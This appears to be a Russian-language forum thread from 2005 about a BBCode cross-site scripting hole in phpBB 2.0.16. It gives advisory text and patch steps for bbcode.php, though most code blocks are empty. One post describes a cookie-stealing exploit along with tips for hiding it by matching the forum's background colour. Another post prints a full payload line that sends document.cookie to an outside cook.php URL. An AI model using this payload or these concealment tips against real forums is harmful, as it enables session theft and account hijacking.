XSS tags в phpbb 2.0.16
Продукт: phpbb
Версия: 2.0.16 и ниже Затронуты файлы: bbcode.php Описание: Уязвимость в phpbb форуме позволяет удаленному пользователю выполнить XSS нападение. Удаленный пользователь может вставить специально обработанную комбинацию BB тегов в сообщение форума, чтобы выполнить произвольный код в браузере пользователя, посетившего злонамеренное сообщение. Уязвимость может использоваться для похищения конфиденциальной информации пользователя (идентификатор сессии или куки). Источник: http://antichat.ru/txt/phpbb/ Устранение: Откройте файл includes/bbcode.php Найдите (202): PHP код:
Замените на: PHP код:
Найдите (206): PHP код:
Замените на: PHP код:
Найдите (210): PHP код:
Замените на: PHP код:
Найдите (214): PHP код:
Замените на: PHP код:
|
забыл пофиксить 4-ю строку переправте, кто фиксил эту уязвимость и кто не фиксил:wink:
|
Лечим межсайтовый скриптинг в форуме PHPNuke!!!
Уязвимость в phpbb форуме (v.2.0.16) позволяет удаленному пользователю выполнить XSS нападение.
Удаленный пользователь может вставить специально обработанную комбинацию BB тегов в сообщение форума, чтобы выполнить произвольный код в браузере пользователя, посетившего злонамеренное сообщение. Уязвимость может использоваться для похищения конфиденциальной информации пользователя (идентификатор сессии или куки). Источники: securitylab.ru/55612.html |
это знакомо.
только теги отображаются под оперой, а под Ie нет. уже старьё. И кстати, для этого скрипта надо подбирать цвет под фоновый формного сообщения. Чтобы не было видно его. Вот так уганяются аккаунты под phpbb. :) Если честно - полезная штука :wink: . |
Эксплойт:
PHP код:
Этот эксплоит отсылает куки пользователя на сниффер по адресу antichat.ru/cgi-bin/s.jpg. Важно: Весь код следует оставить одной строкой, т.к. перевод строки не допускается регулярным выражением в скрипте парсинга. На месте ЦВЕТ_ФОНА следует вписать код фона в сообщении, применяемом в данной шкуре форума. Для стандартного subsilver это #EFEFEF. Это сделано для того, чтобы невооруженным глазом внедрение нашего сплоита не было заметно на других браузерах, где код хотя и воспринимается некорректно, практической пользы не принесет, а вместо этого выкенет в браузер длинную некрасивую ссылку. Весь тест вашего комментария/новости следует писать выше внедряемого эксплоита, т.к. структура выходного HTML кода неправильна и весь последующий текст будет воспринят как ссылка. После лечения вместо эксплойта мы получим [error_url]www.ut[error_url=www.s=''style='font-size:0;color:red'style='top:expression(eval(this.s ss));'sss=#i=new/**/Image();i.src='http://wholesale.co.il/files/cook.php?'+document.cookie;this.sss=null#style='fo nt-size:0;][/url][/url]' Теперь мы имеем защиту от "вложенных" URL в виде [error_url] И запрет на использование ненужных нам символов, таких как обратные кавычки и т.д. Теперь подобные шутки будет видно на раз. Лечение: Открыть includes/bbcode.php Найти: PHP код:
Заменить на: PHP код:
Найти: PHP код:
Перед ним добавить: PHP код:
В конце файла перед ?> добавить функцию: PHP код:
Ну вот и все теперь жить можно спокойно :smile: |
методика хорошая и позволит избежать других подобных эксплойтов!
|
хера вы ребята шпарите! и как вам это тока удаётся?????
|
sid А чего тут сложного? Главное не шляться где попало, а сразу знать, что то что ты сейчас вобъёшь в голову, пригодится в будущем. Так что качай книги в PDF фомате или ещё что-то и сиди, читай и практикуйся. Время решает всё и главнее всего опыт.
Sory за offtop.... |
сразу появляется вопрос!!!! почему в Pdf? мож где в Doc или Txt есть??????????
|
Cyrpheus sid
Народ прекращайте Оффтоп :wink: |
Часовой пояс GMT +4, время: 00:34. |
Copyright © 2005 by Soniks